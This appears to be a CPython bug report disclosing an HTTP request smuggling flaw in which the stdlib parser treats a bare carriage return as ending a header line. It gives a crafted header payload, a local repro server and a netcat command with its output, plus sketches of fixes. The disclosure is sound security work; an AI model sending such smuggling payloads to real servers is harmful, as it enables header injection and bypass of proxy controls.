HTTP request smuggling via misinterpretation of bare CR as header field terminator
kenballus opened this issue · comments
Bug report
Bug description:
The stdlib HTTP parser treats \r as equivalent to \r\n when parsing header field lines. This means that, in the following payload, the Python HTTP parser will see two headers, Visible and Smuggled:
GET / HTTP/1.1\r\n
Visible: :/\rSmuggled: :)\r\n
\r\n
A standards-compliant HTTP server will either convert the bare \r to a single space character, and therefore see only one header, or reject the message as invalid.
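The two acceptable behaviours can be sketched in a few lines of Python. This is only an illustration of the idea, not code from CPython or from any particular server; the names BARE_CR, replace_bare_cr, and reject_bare_cr are hypothetical.

```python
import re

# A CR that is not immediately followed by LF.
BARE_CR = re.compile(rb"\r(?!\n)")


def replace_bare_cr(raw: bytes) -> bytes:
    """Option 1: replace each bare CR with a single space before parsing."""
    return BARE_CR.sub(b" ", raw)


def reject_bare_cr(raw: bytes) -> bytes:
    """Option 2: refuse any header section that contains a bare CR."""
    if BARE_CR.search(raw):
        raise ValueError("bare CR in header section")
    return raw


header_block = b"Visible: :/\rSmuggled: :)\r\n\r\n"

# After replacement only one CRLF-terminated header line remains.
print(replace_bare_cr(header_block))  # b'Visible: :/ Smuggled: :)\r\n\r\n'
```

Either option leaves the recipient with a single Visible header (or no request at all), so it cannot disagree with an upstream proxy about where the header line ends.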
Unfortunately, some HTTP proxy servers don't do this translation, and simply pass bare \r through unchanged within header values. If a server using the CPython stdlib HTTP parser is deployed behind such a proxy, then it is vulnerable to header injection and, subsequently, request smuggling.
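To make the disagreement concrete, here is a minimal sketch of the two views of the same bytes. It does not reproduce the real parsing code of CPython or of any proxy; parse_strict, parse_lenient, and _parse are hypothetical helpers that differ only in which byte sequences they accept as a line terminator.

```python
import re


def _parse(lines: list[bytes]) -> dict[bytes, bytes]:
    """Turn header lines into a dict, stopping at the first empty line."""
    headers: dict[bytes, bytes] = {}
    for line in lines:
        if not line:
            break  # an empty line ends the header section
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers


def parse_strict(raw: bytes) -> dict[bytes, bytes]:
    """Proxy-like view: only CRLF ends a line, so a bare CR stays in the value."""
    return _parse(raw.split(b"\r\n"))


def parse_lenient(raw: bytes) -> dict[bytes, bytes]:
    """Back-end-like view: CRLF, bare CR, and bare LF all end a line."""
    return _parse(re.split(rb"\r\n|\r|\n", raw))


header_block = b"Visible: :/\rSmuggled: :)\r\n\r\n"

proxy_view = parse_strict(header_block)
backend_view = parse_lenient(header_block)

print(sorted(proxy_view))    # [b'visible']
print(sorted(backend_view))  # [b'smuggled', b'visible']
```

Any filtering the proxy applies by header name never sees Smuggled, because in its view those bytes are part of the value of Visible; the back end then treats them as a separate header.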
To confirm the bug for yourself:
cat <<EOF > repro.py
from wsgiref.simple_server import make_server

def app(environ, start_response) -> list[bytes]:
    response_body: bytes = b"".join(k.encode("latin1") + b": " + environ[k].encode("latin1") + b"\n" for k in environ if k.startswith("HTTP_"))
    start_response(
        "200 OK", [("Content-type", "application/json"), ("Content-Length", f"{len(response_body)}")]
    )
    return [response_body]

if __name__ == "__main__":
    with make_server('127.0.0.1', 8000, app) as httpd:
        httpd.default_request_version = "HTTP/1.1"
        httpd.serve_forever()
EOF
python3 repro.py &>/dev/null &
printf 'GET / HTTP/1.1\r\nVisible: :/\rSmuggled: :)\r\n\r\n' | nc localhost 8000
You should see the following output, indicating that \r was interpreted as a line ending:
HTTP/1.0 200 OK
Date: Wed, 31 Jan 2024 05:46:12 GMT
Server: WSGIServer/0.2 CPython/3.13.0a3+
Content-type: application/json
Content-Length: 35
HTTP_VISIBLE: :/
HTTP_SMUGGLED: :)
CPython versions tested on:
CPython main branch
Operating systems tested on:
Linux